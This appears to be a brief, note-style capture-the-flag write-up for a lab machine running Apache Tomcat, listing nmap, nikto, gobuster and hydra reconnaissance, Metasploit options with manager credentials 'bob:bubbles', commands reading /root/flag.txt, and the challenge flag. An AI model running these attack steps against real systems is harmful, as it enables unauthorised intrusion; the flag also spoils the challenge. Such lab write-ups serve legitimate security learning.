IP: 10.10.154.123
Reconnasance
nmap
Enumerating
gobuster
hydra
Exploitation
Apache Tomcat
Privilege Escalation
Apache Tomcat/Coyote JSP engine 1.1
Capture-the-flag
flag.txt
nmap -A -v 10.10.154.123
nikto -h http://10.10.154.123:1234/manager/html -id "bob:bubbles"
nikto -h http://10.10.154.123/
Apache/2.4.18
Find vulnerability for Apache Tomcat/Coyote JSP engine 1.1
run
getuid
cat /root/flag.txt
flag.txt: ff1fc4a81affcc7688cf89ae7dc6e0e1
By AdaniKamal
Last updated 1 year ago
msfconsole -q set HttpUsername bob set HttpPassword bubbles set RHOSTS 10.10.231.52 set RPORT 1234 options